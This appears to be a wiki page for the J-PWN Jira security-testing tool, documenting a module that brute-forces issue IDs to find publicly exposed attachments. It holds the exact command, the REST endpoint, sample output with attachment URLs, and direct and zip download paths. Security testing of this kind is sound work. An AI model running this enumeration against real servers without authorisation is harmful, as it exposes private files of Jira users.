Unauthenticated Public Access to Issue Attachments - carnal0wnage/J-PWN GitHub Wiki
Category: [Info Disclosure]
[CG] This module will attempt to identify any publicly accessible attachments to issues by brute forcing issue IDs
module name: check_download_public_issue_attachment
url: /rest/api/2/issue/<issue_id>/?fields=attachment
python3 j-pwn.py --single https://JIRASERVER/ --module check_download_public_issue_attachment --start_id=10000 --end_id=20000
[INFO] Running single module: check_download_public_issue_attachment
INFO: Issue with Attachment with threading start_id:10000 end_id:20000
[Testing URL]: https://JIRASERVER/rest/api/2/issue/<issue_id>/?fields=attachment
INFO: Total issues to check: 10001
- No attachments found in issue 14000
- No attachments found in issue 16000
- No attachments found in issue 13000
- No attachments found in issue 12000
- No attachments found in issue 15000
- No attachments found in issue 10000
- No attachments found in issue 11000
- No attachments found in issue 17000
- No attachments found in issue 19000
- No attachments found in issue 18000
- No attachments found in issue 11001
- No attachments found in issue 10001
- No attachments found in issue 16001
[+] Attachments found in issue 17707:
- Filename: issue.png
- Content URL: https://JIRASERVER/rest/api/2/attachment/content/10979
- Filename: issue1.png
- Content URL: https://JIRASERVER/rest/api/2/attachment/content/10978
- No attachments found in issue 19001
- No attachments found in issue 15001
- No attachments found in issue 12001
- No attachments found in issue 17001
sometimes it will give you a Content URL that you can just download
https://JIRAEXAMPLE/secure/attachment/10204/uploaded.pdf
If you get something like the above you need to do:
https://JIRAEXAMPLE/secure/attachment/10979/issue.png
or
https://JIRAEXAMPLE/secure/attachmentzip/17707.zip (download all attachments in a zip file)